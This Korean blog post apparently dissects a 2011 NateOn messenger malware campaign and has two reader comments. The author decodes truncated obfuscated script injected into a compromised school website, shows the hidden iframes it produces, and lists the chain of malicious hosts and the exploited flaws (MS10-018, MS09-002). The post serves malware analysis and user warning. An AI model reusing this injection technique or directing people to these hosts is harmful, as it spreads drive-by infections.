posted by Kwan's 2011. 1. 2. 23:51
기존의 바로 악성코드 받는 방식이 아닌 스크립트 삽입을 통해서 연결되기에 이렇게 글을 써 봅니다.


네이트온 악성코드는 기존의 바로 받는 방식이었지만 지금은 다양하게 유포되고 있습니다. 최근에 따라 이렇게 보여지고 있으므로 글로 남겨 봅니다. 어제 받은 네이트온 악성코드 쪽지 입니다. 링크를 클릭시 기존에는 바로 다운로드 링크로 넘어갔지만 지금은 그 사이트 안에 코드삽입을 해놓으므로 악성코드를 감염시키는 역활을 합니다 !

위에 링크에 따라 들어가면 취약한 한 초등학교 홈페이지로 넘어갑니다.


이와 같이 보이는곳에는 아무렇지 않은 현상이 나타납니다. 하지만 그안에 소스 자체를 본다면 이 사이트가 또 다른 사이트와 연결되는 스크립트가 있다는 것을 알 수 있습니다. 자세한 소스를 본다면 이렇게 나타나 있습니다.
 

 [원본 소스]
document.write(String.fromCharCode(60,105,102,114,97,109,101,32,102,114,97,109,101,98,(중략),62,32));<!--
-->

이 스트립트를 실행시키면 다음과 같습니다.

[스크립트 실행 후]

<iframe frameborder=0 src=http://www.rkcg.org/생략/생략/members/index.html width=100 height=1 scrolling=no></iframe>


이와 같이 하나의 경유지로 다시 연결되는것을 볼 수 있습니다. 해당 사이트는 현재도 열려 있으며 악성코드에 영향을 받으니 조심하시기 바랍니다.
다시 본론으로 들어가 index.html 을 따라 들어가 보겠습니다.

해당 사이트의 연결 되어 있는 곳은 다음과 같습니다.

http://www.rkcg.org/생략/생략/style.css
http://www.rkcg.org/생략/생략/members/main.html
http://www.rkcg.org/생략/생략/members/in.js
http://www.talkpic.com/생략/생략/js/ajax.js

style.css : 현재 HTTP/1.1 404 Not Found

in.js :
http://www.rkcg.org/생략/생략/members/ff10.htm
→ ff10.htm → ie.html , ff.html → cosplay.swf 연결
cosplay.swf : 취약점 이용 swf !!

ajax.js : 별거 없음 !!

main.html : http://www.rkcg.org/생략/생략/members/kr1.html 연결 !!

메인 악성코드 연결지인 main.html로 넘어가볼까요??
먼저 함수값은 두개가 주어 졌습니다. 저같은 경우는 거의 그냥 코드 대입으로 해서 스크립트를 실행 시켜 보았습니다.

function AAAA(){
var ss =Array(60,105,102,114,97,109,101,32,102,114,97,109,101,(중략),105,102,114,97,109,101,62);

function BBBB(){
var ss2 =Array(60,105,102,114,97,109,101,32,102,114,97,109,101,(중략),105,102,114,97,109,101,62);

저 같은 경우는 두 코드를 아래와 같이 대입하는 방법을 썼습니다 !

document.write(String.fromCharCode());

위에의 코드를 실행시켜 보면 안보이던 사이트가 다음과 같이 등장 합니다.

<iframe frameborder=0 src=kr1.html width=100 height=1 scrolling=no></iframe>
<iframe frameborder=0 src=kr2.html width=100 height=1 scrolling=no></iframe>

이런 과정을 통해서 최종스크립트인 kr1.html 과 kr2.html을 찾을 수 있었습니다.
마지막 최종 파일은 링크로 대신합니다 !!

kr1.html : http://www.ycma.net/생략/생략/top.jpg
kr2.html : http://www.ycma.net/생략/생략/top.jpg

연결 하는 최종 파일위치는 둘다 같습니다 !!

* 이용된 취약점

kr1.html : MS10-018


kr2.html : MS09-002, CVE-2009-0075


댓글을 달아 주세요

  1. 벌새 2011.01.03 00:08 신고  Addr  Edit/Del  Reply

    저 방식을 12월경부터 보고 있었는데, 제가 확인할 때랑 달라진 부분은 없어 보이는군요.

    근데 제가 한 번 확인할 때는 main.html 파일을 확인 못해서(안보였나?) 취약점을 찾지 못해서 공개를 안했었습니다.ㅠㅠ

    찾으셨군요~^^

    • Kwan's 2011.01.03 00:10 신고  Addr  Edit/Del

      역시 벌새님은 빠르셔요~ㅠ
      12월 부터라니 이제는 다 방면으로 유포를 하네요 ㅠ